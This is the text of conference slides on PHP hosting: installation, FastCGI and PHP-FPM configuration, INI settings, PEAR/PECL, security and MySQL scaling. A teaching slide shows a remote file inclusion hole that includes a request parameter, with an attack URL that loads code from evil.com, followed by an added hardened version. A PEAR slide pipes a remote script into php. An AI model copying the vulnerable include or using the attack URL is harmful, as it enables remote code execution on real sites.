Php through the eyes of a hoster confoo
combell-group
PHP through the eyes of a hoster
Thijs Feryn
Evangelist
+32 (0)9 218 79 [email protected]
Very excited to be here !
THIJS
TAZE
Evangelist
@ThijsFeryn
Chapter I : The hoster, a genuine stakeholder in the PHP universe
Stakeholders
[Diagram: Customer, Development company, Hoster, PHP community. Labels: Endusers, MGMT, Internal IT, Internal PM, Devs, Sales, MGMT, QA, Design, Systeam, PM, Consultant]
Stakeholders
Your app needs to be hosted
Somewhere along the road ...
Goals & motives
Our goals & motives are the same as yours:
• It has to work
• It has to perform
• It has to scale
• It has to be secure
• It has to be available
What about the Cloud?
Chapter II: Installation & configuration
There’s more than just Apache
Installing from source
server$ ./configure --with-ttf --with-freetype-dir=/usr/lib --prefix=/data/jail/usr/local/php-5.3.8 --with-mysql --with-mysqli --with-mssql --enable-exif --enable-soap --with-mcrypt --with-mhash --with-curl --enable-mbstring --with-gettext --with-zlib --enable-ftp --with-openssl --with-xsl --with-db4 --with-pgsql --enable-calendar --enable-bcmath --with-bz2 --with-imap=/data/jail/usr/local/imap --with-imap-ssl --with-pdo-mysql=/usr/bin/mysql_config --with-jpeg-dir=/usr/lib --with-gd --enable-zip --with-xmlrpc --enable-sockets
server$ make
server$ make install
Installing using a package manager (APT/Aptitude)
Install PHP:
server$ apt-get install php5
Install MySQL library for PHP:
server$ apt-get install php5-mysql
SAPI ... schmapi
Columns: Mod_php | FastCGI | PHP-FPM | CLI
Web: Apache module | gateway | -
Process: Apache process | php-cgi | php-fpm daemon | php
Configuration: Apache conf files | wrapper | config per pool | on the fly
User: Apache user | shell user or suexec user | user per pool | shell user
FastCGI
Example config:
• Apache handler

<IfModule mod_fcgid.c>
    SuexecUserGroup dev dev
    PHP_Fix_Pathinfo_Enable 1
    <Directory /var/www/dev/www/>
        Options +ExecCGI
        AllowOverride All
        AddHandler fcgid-script .php
        FCGIWrapper /var/www/dev/etc/fcgi.wrapper .php
        Order allow,deny
        Allow from all
    </Directory>
</IfModule>
FastCGI
Example config:
• Wrapper script

#!/bin/sh
PHPRC=/usr/local/php-5.3.10/etc
export PHPRC
export PHP_FCGI_MAX_REQUESTS=5000
export PHP_FCGI_CHILDREN=8
exec /usr/local/php-5.3.10/bin/php-cgi
PHP-FPM
Example config in Nginx:

server {
    root /var/www;
    index index.php index.html index.htm;
    server_name myserver.ext;

    location / {
        try_files $uri $uri/ /index.html;
    }

    location ~ \.php$ {
        fastcgi_split_path_info ^(.+\.php)(/.+)$;
        fastcgi_pass 127.0.0.1:9000;
        fastcgi_index index.php;
        include fastcgi_params;
    }
}
PHP-FPM
Example config in PHP-FPM main www pool:

[www]
user = www-data
group = www-data
listen = 127.0.0.1:9000
listen.owner = www-data
listen.group = www-data
listen.mode = 0666
listen.allowed_clients = 127.0.0.1
pm = dynamic
pm.max_children = 10
pm.start_servers = 4
pm.min_spare_servers = 2
pm.max_spare_servers = 6
pm.max_requests = 500
INI settings: tales of good & evil
Defining INI settings:
• Php.ini
• Ini_set()
• "-d"
• php_value
• php_flag
• php_admin_value
• php_admin_flag
INI settings: tales of good & evil
Memory_limit:
Fatal error: Allowed memory size of 16777216 bytes exhausted (tried to allocate 35 bytes)
INI settings: tales of good & evil
Safe_mode & Open_basedir:

<IfModule mod_php5.c>
    php_admin_flag engine on
    php_admin_flag safe_mode off
    php_admin_value open_basedir "/var/www/vhosts/website.com/httpdocs:/tmp"
</IfModule>
INI settings: tales of good & evil
Allow_url_fopen & allow_url_include:

<?php
$lang = $_GET['lang'];
require("$lang.php");
http://domain.ext/index.php?lang=http://evil.com/hack.txt?
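A hardened counterpart to the include above, as an added example that is not part of the original slides: the request value is only ever compared against a fixed allowlist, and a helper reports whether the runtime still permits URL includes. The language codes, the lang/ directory and the function names are assumptions made for illustration.

```php
<?php
// Added example (not from the original slides). The directory layout and the
// language codes below are assumptions made for illustration.

// Only these language files may ever be loaded; anything else falls back.
const ALLOWED_LANGS = ['en', 'nl', 'fr'];   // hypothetical language set
const DEFAULT_LANG  = 'en';

/**
 * Map untrusted input to one of the allowlisted language codes.
 * A URL, a path containing "../" or an array can never equal an allowlist
 * entry, so remote and local file inclusion are both ruled out here.
 */
function resolveLang($requested): string
{
    if (is_string($requested) && in_array($requested, ALLOWED_LANGS, true)) {
        return $requested;
    }
    return DEFAULT_LANG;
}

/** Build the include path from a fixed base directory plus a vetted code. */
function langFile(string $baseDir, $requested): string
{
    return rtrim($baseDir, '/') . '/' . resolveLang($requested) . '.php';
}

/**
 * Report whether the runtime still permits URL includes. require() only
 * fetches http:// URLs when both settings are on; allow_url_include belongs
 * off in php.ini no matter how careful the application code is.
 */
function urlIncludeEnabled(): bool
{
    $on = fn(string $k): bool => filter_var(ini_get($k), FILTER_VALIDATE_BOOLEAN);
    return $on('allow_url_fopen') && $on('allow_url_include');
}

// Constructed inputs: a normal request, the value from the slide's URL,
// a traversal attempt and a missing parameter.
foreach (['nl', 'http://evil.com/hack.txt?', '../../etc/passwd', null] as $input) {
    printf("%-28s -> %s\n", var_export($input, true), langFile(__DIR__ . '/lang', $input));
}
printf("URL includes enabled: %s\n", urlIncludeEnabled() ? 'yes' : 'no');
// In the application itself: require langFile(__DIR__ . '/lang', $_GET['lang'] ?? null);
```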
Chapter III: Versions & features
PHP 4: End of life, but far from dead
PHP 4: End of life, but not yet dead
Parse error: syntax error, unexpected T_STRING, expecting T_OLD_FUNCTION or T_FUNCTION or T_VAR or '}' in test.php on line 4
Developers love bling bling
It HAS to be PHP 5.3.10 !!!
I need ALL PHP extension !!!
I use ALL PHP features !!!
And then there’s
DOT
Fruit & vegetables: PEAR & PECL
PEAR: PHP Extension and Application Repository (http://pear.php.net)
server$ pear install date
server$ lynx -source http://pear.php.net/go-pear | php
Fruit & vegetables: PEAR & PECL
PECL (pickle): PHP Extension Community Library (http://pecl.php.net)
server$ pecl install pecl_http
Popular frameworks outside the PHP project
External frameworks
Chapter IV: PHP attracts a crowd
It’s easy !
That easy !
<?php
echo "Hello world!";
It’s cheap !
It’s stable !
Everyone can be a PHP developer
But not everyone has what it takes
Luckily there’s a lot of ready-to-use PHP software out there
Who you gonna call ?
But when helpers need help ...
They reach out to the PHP community
Blogs
Forums
User Group meetings
Conferences
PHP.net
Twitter
IRC
Chapter V: Here be phpirates
Here be phpirates
Fact
“The majority of hacking/abuse cases are PHP related”
False assumptions
“Open source is evil”
“PHP has lots of security vulnerabilities and is not mature”
Here be phpirates
The real issues
• Quality of the code
• Network & server security
• PHP version & configuration
Responsibilities
Chapter VI: Scalability
Performance == speed
Scalability == constant speed under increasing load
Scaling up
Scaling out
Developers (sometimes) forget ...
Scaling MySQL
mysql> explain SELECT field1, (SELECT COUNT(*) FROM table2 WHERE field3 = table1.id) FROM table1 WHERE field2 = 1 ORDER BY field4 DESC limit 12,12;
*************************** 1. row ***************************
           id: 1
  select_type: PRIMARY
        table: table1
         type: ALL
possible_keys: approved
          key: approved
      key_len: NULL
          ref: NULL
         rows: 3143
        Extra: Using where; Using filesort
*************************** 2. row ***************************
           id: 2
  select_type: DEPENDENT SUBQUERY
        table: table2
         type: ALL
possible_keys: NULL
          key: NULL
      key_len: NULL
          ref: NULL
         rows: 1005
        Extra: Using where
mysql> show processlist;
+-------+------+-----------+----+---------+------+----------------------+-------------------------------------------------+
| Id    | User | Host      | db | Command | Time | State                | Info                                            |
+-------+------+-----------+----+---------+------+----------------------+-------------------------------------------------+
| 63515 | root | localhost | db | Query   |    0 | NULL                 | show processlist                                |
| 81763 | root | localhost | db | Sleep   |  105 |                      | NULL                                            |
| 85187 | root | localhost | db | Query   |    0 | Sending data         | SELECT data from someTable where field = 'val'  |
| 82701 | root | localhost | db | Query   |    0 | Copying to tmp table | SELECT data from someTable where field='val2'   |
| 82709 | root | localhost | db | Query   |    0 | Sorting result       | SELECT data from someTable where order by field |
| 82716 | root | localhost | db | Query   |    0 | Opening tables       | SELECT data from someOtherTable                 |
+-------+------+-----------+----+---------+------+----------------------+-------------------------------------------------+
Scaling MySQL with replication
PHP scalability toolbox
Memcached
Gearman
Varnish
Summary
1. Hosters are a genuine stakeholder in the PHP universe
2. PHP is highly flexible & configurable. Hosters have to ensure a decent setup
3. PHP has a lot to offer feature-wise
4. PHP attracts a crowd and brings a lot of people together from different industries (e.g. hosters)
5. Lots of abuse cases are PHP related, but that’s not the fault of PHP itself
6. PHP itself doesn’t scale *that* well, but is flexible enough to ensure scalability via extra tools
Q&A